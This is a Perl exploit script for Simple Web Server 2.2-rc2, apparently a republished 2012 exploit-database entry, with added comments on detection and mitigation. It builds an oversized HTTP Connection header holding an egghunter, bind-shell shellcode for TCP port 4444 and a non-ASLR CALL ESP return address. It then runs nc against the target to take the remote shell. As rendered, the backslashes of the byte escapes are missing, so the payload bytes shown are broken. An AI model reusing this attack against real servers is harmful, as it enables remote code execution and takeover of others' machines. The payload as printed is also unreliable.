
# Title : Simple Web Server 2.2-rc2 ASLR Bypass Exploit
# Published : 2012-08-28
# Author :


use IO::Socket; 

# Exploit Title: SWS 2.2-rc2 - Remote code execution Egghunting + ASLR bypass
# Date: 28/8/2012
# Special Regards to Mr.pr0n ,Corelan team , immunity u guys are first !!! based on a POC by MR. Pr0n
# Author: pole
# Tested on Windows 7 32bit
# NOTE : If the exploit does not run properly, configure the server on another HTTP port (here port 8000 was used) and make sure the server is showing "GREEN" (enabled).
# Banner.  As rendered on this page the backslash of every "\n"/"\x.." escape
# has been lost, so each string literal below is the plain text shown, not the
# bytes the author intended; the code is annotated as written.
print "Exploit by Dhruval n";

# Two positional arguments are required: target host and target port.
if (@ARGV != 2)
{
   print "n[-] Usage: $0 <target ip> <port> nn";
   exit();
}

# No `use strict`/`use warnings`: every variable in this script is an
# undeclared package global.
$target = $ARGV[0]; # Target IP
$port 	= $ARGV[1]; # Target port

# First-stage stub, labelled "egghunter" by the author.  It is placed last in
# $exploit (see below) and carries the 4-byte tag "w00t"; the tag is written
# twice ("w00tw00t") immediately before $shellcode so the stub can locate it.
$egghunter  =
"x66x81xCAxFFx0Fx42x52x6Ax02".
"x58xCDx2Ex3Cx05x5Ax74xEFxB8".
"w00t". # The 4 byte tag!
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7";
 
# MSF windows/shell_bind_tcp LPORT=4444
# Per the author's label this is a Metasploit bind shell on TCP/4444.
# Detection/containment note: a web-server process opening a new inbound
# listener on 4444 is the post-exploitation indicator, and host/network ingress
# filtering on that port blocks the operator's follow-up connection (see the
# `nc` call at the end of the script).
$shellcode =
"xdaxc5xd9x74x24xf4x2bxc9xbax3ax04xccxb6x5e".
"xb1x56x31x56x19x83xeexfcx03x56x15xd8xf1x30".
"x5ex95xfaxc8x9fxc5x73x2dxaexd7xe0x25x83xe7".
"x63x6bx28x8cx26x98xbbxe0xeexafx0cx4exc9x9e".
"x8dx7fxd5x4dx4dx1exa9x8fx82xc0x90x5fxd7x01".
"xd4x82x18x53x8dxc9x8bx43xbax8cx17x62x6cx9b".
"x28x1cx09x5cxdcx96x10x8dx4dxadx5bx35xe5xe9".
"x7bx44x2axeax40x0fx47xd8x33x8ex81x11xbbxa0".
"xedxfdx82x0cxe0xfcxc3xabx1bx8bx3fxc8xa6x8b".
"xfbxb2x7cx1ex1ex14xf6xb8xfaxa4xdbx5ex88xab".
"x90x15xd6xafx27xfax6cxcbxacxfdxa2x5dxf6xd9".
"x66x05xacx40x3exe3x03x7dx20x4bxfbxdbx2ax7e".
"xe8x5dx71x17xddx53x8axe7x49xe4xf9xd5xd6x5e".
"x96x55x9ex78x61x99xb5x3cxfdx64x36x3cxd7xa2".
"x62x6cx4fx02x0bxe7x8fxabxdexa7xdfx03xb1x07".
"xb0xe3x61xefxdaxebx5ex0fxe5x21xe9x08x2bx11".
"xb9xfex4exa5x2fxa2xc7x43x25x4ax8exdcxd2xa8".
"xf5xd4x45xd3xdfx48xddx43x57x87xd9x6cx68x8d".
"x49xc1xc0x46x1ax09xd5x77x1dx04x7dxf1x25xce".
"xf7x6fxe7x6fx07xbax9fx0cx9ax21x60x5bx87xfd".
"x37x0cx79xf4xd2xa0x20xaexc0x39xb4x89x41xe5".
"x05x17x4bx68x31x33x5bxb4xbax7fx0fx68xedx29".
"xf9xcex47x98x53x98x34x72x34x5dx77x45x42x62".
"x52x33xaaxd2x0bx02xd4xdaxdbx82xadx07x7cx6c".
"x64x8cx8cx27x25xa4x04xeexbfxf5x48x11x6ax39".
"x75x92x9fxc1x82x8axd5xc4xcfx0cx05xb4x40xf9".
"x29x6bx60x28x23";

# Padding sized so that junk + "w00tw00t" + shellcode is exactly 2048 bytes;
# the return address and the stub are appended after that fixed-size region.
$junk 		= "x41" x (2048 - length("w00tw00t") - length($shellcode));
# Return address, little-endian.  The author's comment says it is a CALL ESP
# gadget in a module loaded without ASLR, which is the whole "ASLR bypass":
# the address is stable only because that one DLL opts out of randomisation.
# Mitigation on the defending side is to enforce ASLR for all modules
# (mandatory/forced ASLR, or relinking the library with /DYNAMICBASE); the two
# commented-out alternatives below show the gadget is the only host-specific
# value in the buffer.
$ret		= pack('V',0x6FC8E251);     	# CALL ESP - libstdc++-6.dll Non Aslr
#$ret = pack('V',0x7C82385D); #call ESP
#$ret = pack ('V',0x75560D1B); #call ESP ASLR AWARE :)
$nops 		= "x90" x 20; 			# 20 nops.
# Final buffer layout: [padding][tag][shellcode][ret][nops][stub].
$exploit   	= $junk."w00tw00t".$shellcode.$ret.$nops.$egghunter;

# Plain TCP connection to the target's HTTP port; no TLS, no proxy.
if ($socket = IO::Socket::INET->new
     (PeerAddr => $target,
      PeerPort => $port,
      Proto => "TCP"))
{
   # The whole buffer travels as the value of a single "Connection:" request
   # header.  Detection note: a GET / whose Connection header is >2 KB of
   # repeated padding has no legitimate use and is an easy IDS/WAF or
   # access-log signature for this class of header-overflow attack.
   $header =
        "GET / HTTP/1.1rn".
        "Host: ".$target." rn".
        "Connection:".$exploit."rn";
	print "n[+] Sending buffer (".(length($exploit))." bytes) to: $target:$port n";
        print $socket $header."rn";
        # Brief pause before closing so the request is fully flushed; the
        # socket is closed without reading any response.
        sleep(1);
        close($socket);
	print "[+] Exploitation Done!n";
	print "[+] Please, wait couple of sec ...n";
	sleep(1);
	print "[+] Got shell?nn";
        # Hands off to an external `nc` to connect to the bind port named in
        # the shellcode comment above.  $target is interpolated into a shell
        # command string; the list form `system('nc', $target, '4444')` would
        # keep the argument out of the shell entirely.
        $command = "nc $target 4444";
        system ($command);
}
 
else
{
    print "[-] Connection to $target failed!n";
}